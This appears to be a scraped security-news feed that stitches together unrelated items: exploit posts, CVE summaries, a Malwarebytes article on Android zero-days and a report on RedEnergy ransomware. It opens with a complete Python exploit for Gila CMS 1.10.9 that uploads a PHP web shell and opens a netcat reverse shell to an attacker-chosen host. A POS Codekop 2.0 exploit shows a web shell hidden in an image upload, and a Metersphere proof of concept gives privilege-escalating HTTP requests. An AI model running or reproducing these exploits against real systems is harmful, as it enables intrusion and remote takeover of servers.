Gila CMS version 1.10.9 suffers from a remote code execution vulnerability.

    # Exploit Title: Gila CMS 1.10.9 - Remote Code Execution (RCE) (Authenticated)# Date: 05-07-2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://gilacms.com/# Software Link: https://github.com/GilaCMS/gila/# Version: Gila 1.10.9# Tested on: Linuximport requestsfrom termcolor import coloredfrom urllib.parse import urlparse# Print ASCII artascii_art = """ ██████╗ ██╗██╗      █████╗      ██████╗███╗   ███╗███████╗    ██████╗  ██████╗███████╗██╔════╝ ██║██║     ██╔══██╗    ██╔════╝████╗ ████║██╔════╝    ██╔══██╗██╔════╝██╔════╝██║  ███╗██║██║     ███████║    ██║     ██╔████╔██║███████╗    ██████╔╝██║     █████╗  ██║   ██║██║██║     ██╔══██║    ██║     ██║╚██╔╝██║╚════██║    ██╔══██╗██║     ██╔══╝  ╚██████╔╝██║███████╗██║  ██║    ╚██████╗██║ ╚═╝ ██║███████║    ██║  ██║╚██████╗███████╗ ╚═════╝ ╚═╝╚══════╝╚═╝  ╚═╝     ╚═════╝╚═╝     ╚═╝╚══════╝    ╚═╝  ╚═╝ ╚═════╝╚══════╝                              by Unknown_Exploit"""print(colored(ascii_art, "green"))# Prompt user for target URLtarget_url = input("Enter the target login URL (e.g., http://example.com/admin/): ")# Extract domain from target URLparsed_url = urlparse(target_url)domain = parsed_url.netloctarget_url_2 = f"http://{domain}/"# Prompt user for login credentialsusername = input("Enter the email: ")password = input("Enter the password: ")# Create a session and perform loginsession = requests.Session()login_payload = {    'action': 'login',    'username': username,    'password': password}response = session.post(target_url, data=login_payload)cookie = response.cookies.get_dict()var1 = cookie['PHPSESSID']var2 = cookie['GSESSIONID']# Prompt user for local IP and portlhost = input("Enter the local IP (LHOST): ")lport = input("Enter the local port (LPORT): ")# Construct the payloadpayload = f"rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/bash+-i+2>%261|nc+{lhost}+{lport}+>/tmp/f"payload_url = f"{target_url_2}tmp/shell.php7?cmd={payload}"# Perform file upload using POST requestupload_url = f"{target_url_2}fm/upload"upload_headers = {    "Host": domain,    "Content-Length": "424",    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36",    "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarynKy5BIIJQcZC80i2",    "Accept": "*/*",    "Origin": target_url_2,    "Referer": f"{target_url_2}admin/fm?f=tmp/.htaccess",    "Accept-Encoding": "gzip, deflate",    "Accept-Language": "en-US,en;q=0.9",    "Cookie": f"PHPSESSID={var1}; GSESSIONID={var2}",    "Connection": "close"}upload_data = f'''------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="uploadfiles"; filename="shell.php7"Content-Type: application/x-php<?php system($_GET["cmd"]);?>------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="path"tmp------WebKitFormBoundarynKy5BIIJQcZC80i2Content-Disposition: form-data; name="g_response"content------WebKitFormBoundarynKy5BIIJQcZC80i2--'''upload_response = session.post(upload_url, headers=upload_headers, data=upload_data)if upload_response.status_code == 200:    print("File uploaded successfully.")    # Execute payload    response = session.get(payload_url)    print("Payload executed successfully.")else:    print("Error uploading the file:", upload_response.text)

Gila CMS 1.10.9 Remote Code Execution

Metersphere is an open source continuous testing platform. In versions prior to 2.10.2 LTS, some key APIs in Metersphere lack permission checks. This allows ordinary users to execute APIs that can only be executed by space administrators or project administrators. For example, ordinary users can be updated as space administrators. Version 2.10.2 LTS has a patch for this issue.

**Summary**

目前metersphere 一些关键的API缺少了权限检查，比如workspace中的/setting/workspace/member/update，/setting/user/special/ws/member/add, /special/ws/member/delete/{workspaceId}/{userId} 以及project相关的API。

**PoC**

以workspace中的/setting/workspace/member/update利用为例

1 user1 是workspace1的空间管理员

2 user2 是workspace1的成员

3 user1 更新user2的信息，比如将其更新为空间管理员

4 使用burpsuite拦截请求

    以workspace中的/setting/workspace/member/update 为例
    
    POST /setting/workspace/member/update HTTP/1.1
    Host: 192.168.213.128:8081
    Content-Length: 144
    Accept-Language: zh-CN
    WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
    Content-Type: application/json
    Accept: application/json, text/plain, */*
    CSRF-TOKEN: 7wl7UAaQcpdQ+lolQXV1WYWQ+BLvd2bx2BQS22BoFb3UGqDlIbQjbELrNWgOzLgfc4YPf6nSUgllo/qpOudisg==
    X-AUTH-TOKEN: 52d843aa-8791-43be-a191-f04f975f2be2
    PROJECT: 2d2c879f-3f78-4701-aa6f-35aeedc25069
    Origin: http://192.168.213.128:8081
    Referer: http://192.168.213.128:8081/
    Accept-Encoding: gzip, deflate
    Cookie: __stripe_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step_dashboard=true; step_client_index=true; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; lastTaskModule=0; lastBugModule=0; preBranch=0; storyPreExecutionID=1; lastProduct=0; lastDocModule=0; checkedItem=6%2C4%2C3; docFilesViewType=card; preProductID=1; goback=%7B%22execution%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22admin%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fcompany-browse.html%22%2C%22qa%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22doc%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fdoc-objectLibs-custom-0-9.html%22%7D; tab=execution
    Connection: close
    
    {"id":"user2","name":"user2","email":"user2@test.com","phone":null,"groupIds":["ws_admin"],"workspaceId":"bd6fc04b-15af-43dc-8cb6-411deaec81a7"}
    

5 将上述请求中的CSRF-TOKEN和X-AUTH-TOKEN替换成user2的，即以user2的身份执行请求

6 发现执行结果成功，即普通用户可以执行管理员才能执行的update

**Impact**

普通用户可以执行空间管理员或者project管理员才能执行的API，比如可以将普通用户更新成空间管理员。

CVE-2023-35937: metersphere 存在权限检查缺失漏洞

Categories: Exploits and vulnerabilities
Categories: News
Tags: Google

Tags:  Android

Tags:  2023-07-05

Tags:  CVE2021-29256

Tags:  CVE-2023-26083

Tags:  CVE-2023-2136

Tags:  CVE-2023-21250

Tags:  ARM

Tags:  Skia

Google has patched 43 vulnerabilities in Android, three of which are actively exploited zero-day vulnerabilities. 



(Read more...)




The post Update Android now! Google patches three actively exploited zero-days appeared first on Malwarebytes Labs.

In July’s update for the Android operating system (OS), Google has patched 43 vulnerabilities, three of which are actively exploited zero-day vulnerabilities.

The security bulletin notes that there are indications that these three vulnerabilities may be under limited, targeted exploitation.

If your Android phone is at patch level 2023-07-05 or later then the issues discussed below have been fixed. The updates have been made available for Android 10, 11, 12, 12L and 13. Android partners are notified of all issues at least a month before publication, however, this doesn’t always mean that the patches are available for devices from all vendors.

You can find your device's Android version number, security update level, and Google Play system level in your Settings app. You'll get notifications when updates are available for you, but you can also check for updates.

For most phones it works like this: Under **About phone** or **About device** you can tap on **Software updates** to check if there are new updates available for your device, although there may be slight differences based on the brand, type, and Android version of your device.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs listed as actively exploited are:

CVE-2023-26083: a memory leak vulnerability in Mali GPU Kernel Driver in Midgard GPU Kernel Driver all versions from r6p0 - r32p0, Bifrost GPU Kernel Driver all versions from r0p0 - r42p0, Valhall GPU Kernel Driver all versions from r19p0 - r42p0, and Avalon GPU Kernel Driver all versions from r41p0 - r42p0 allows a non-privileged user to make valid GPU processing operations that expose sensitive kernel metadata.

ARM was warned about this vulnerability on March 31, 2023 and stated:

> “There is evidence that this vulnerability may be under limited, targeted exploitation.”

CVE-2021-29256: The Arm Mali GPU kernel driver allows an unprivileged user to achieve access to freed memory, leading to information disclosure or root privilege escalation. This affects Bifrost r16p0 through r29p0 before r30p0, Valhall r19p0 through r29p0 before r30p0, and Midgard r28p0 through r30p0.

Both of the above vulnerabilities are present in the ARM Mali GPU, which is the graphics processor of many Android phones. A patch for both vulnerabilities had been issued by ARM, but Google has decided to include them in this month’s Android update.

CVE-2023-2136: An integer overflow in Skia in Google Chrome prior to 112.0.5615.137 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page.

This vulnerability is affecting the Skia 2D graphics library used in Android systems. Skia is an open source 2D graphics library for drawing Text, Geometries, and Images.

It is likely that attackers would use the vulnerability in Skia as a first stage and then use one of the Mali vulnerabilities to complete a device takeover.

Another vulnerability that caught our eye was CVE-2023-21250: a critical vulnerability in the System component that could lead to remote code execution with no additional execution privileges needed and no user interaction is needed for exploitation. Further details were not revealed to give users a chance to install the patch first.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Update Android now! Google patches three actively exploited zero-days

A sophisticated stealer-as-a-ransomware threat dubbed RedEnergy has been spotted in the wild targeting energy utilities, oil, gas, telecom, and machinery sectors in Brazil and the Philippines through their LinkedIn pages.
The malware "possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for

Critical Infrastructure Security

A sophisticated stealer-as-a-ransomware threat dubbed **RedEnergy** has been spotted in the wild targeting energy utilities, oil, gas, telecom, and machinery sectors in Brazil and the Philippines through their LinkedIn pages.

The malware "possesses the ability to steal information from various browsers, enabling the exfiltration of sensitive data, while also incorporating different modules for carrying out ransomware activities," Zscaler researchers Shatak Jain and Gurkirat Singh said in a recent analysis.

The goal, the researchers noted, is to couple data theft with encryption with the goal of inflicting maximum damage to the victims.

The starting point for the multi-stage attack is a FakeUpdates (aka SocGholish) campaign that tricks users into downloading JavaScript-based malware under the guise of web browser updates.

What makes it novel is the use of reputable LinkedIn pages to target victims, redirecting users clicking on the website URLs to a bogus landing page that prompts them to update their web browsers by clicking on the appropriate icon (Google Chrome, Microsoft Edge, Mozilla Firefox, or Opera), doing so which results in the download a malicious executable.

Following a successful breach, the malicious binary is used as a conduit to set up persistence, perform the actual browser update, and also drop a stealer capable of covertly harvesting sensitive information and encrypting the stolen files, leaving the victims at risk of potential data loss, exposure, or even the sale of their valuable data.

Zscaler said it discovered suspicious interactions taking place over a File Transfer Protocol (FTP) connection, raising the possibility that valuable data is being exfiltrated to actor-controlled infrastructure.

In the final stage, RedEnergy's ransomware component proceeds to encrypt the user's data, suffixing the ".FACKOFF!" extension to each encrypted file, deleting existing backups, and dropping a ransom note in each folder.

Victims are expected to make a payment of 0.005 BTC (about $151) to a cryptocurrency wallet mentioned in the note to regain access to the files. RedEnergy's dual functions as a stealer and ransomware represent an evolution of the cybercrime landscape.

The development also follows the emergence of a new RAT-as-a-ransomware threat category in which remote access trojans such as Venom RAT and Anarchy Panel RAT have been equipped with ransomware modules to lock various file extensions behind encryption barriers.

"It is crucial for individuals and organizations to exercise utmost caution when accessing websites, especially those linked from LinkedIn profiles," the researchers said. "Vigilance in verifying the authenticity of browser updates and being wary of unexpected file downloads is paramount to protect against such malicious campaigns."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

RedEnergy Stealer-as-a-Ransomware Threat Targeting Energy and Telecom Sectors

POS Codekop version 2.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)# Date: 25-05-2023# Exploit Author: yuyudhn# Vendor Homepage: https://www.codekop.com/# Software Link: https://github.com/fauzan1892/pos-kasir-php# Version: 2.0# Tested on: Linux# CVE: CVE-2023-36348# Vulnerability description: The application does not sanitize the filenameparameter when sending data to /fungsi/edit/edit.php?gambar=user. Anattacker can exploit this issue by uploading a PHP file and accessing it,leading to Remote Code Execution.# Reference: https://yuyudhn.github.io/pos-codekop-vulnerability/# Proof of Concept:1. Login to POS Codekop dashboard.2. Go to profile settings.3. Upload PHP script through Upload Profile Photo.Burp Log Example:```POST /research/pos-kasir-php/fungsi/edit/edit.php?gambar=user HTTP/1.1Host: localhostContent-Length: 8934Cache-Control: max-age=0sec-ch-ua:sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""**Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data;boundary=----WebKitFormBoundarymVBHqH4m6KgKBnpaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-User: ?1**Sec-Fetch-Dest: documentReferer: http://localhost/research/pos-kasir-php/index.php?page=userAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=vqlfiarme77n1r4o8eh2kglfhvConnection: close------WebKitFormBoundarymVBHqH4m6KgKBnpaContent-Disposition: form-data; name="foto"; filename="asuka-rce.php"Content-Type: image/jpegÿØÿà JFIF HHÿþ6<?php passthru($_GET['cmd']); __halt_compiler(); ?>ÿÛC-----------------------------```PHP Web Shell location:http://localhost/research/pos-kasir-php/assets/img/user/[random_number]asuka-rce.php

POS Codekop 2.0 Shell Upload

The Tutor LMS WordPress plugin before 2.2.1 does not implement adequate permission checks for REST API endpoints, allowing unauthenticated attackers to access information from Lessons that should not be publicly available.

CVE-2023-3133: Tutor LMS – eLearning and online course solution

Out of bounds read in Google Security Processor firmware in Google Chrome on Chrome OS prior to 114.0.5735.90 allowed a local attacker to perform denial of service via physical access to the device. (Chromium security severity: Medium)

CVE-2023-3497

During a Mojo IPC method call, there are multiple stages of validation and deserialization that take place. These assume that the contents of the message cannot be modified during the deserialization process, but the new core_ipcz implementation returns message contents directly in shared memory.

Chrome Mojo Message Validation Bypass

Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability

CVE-2021-34506

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability

Tag

#chrome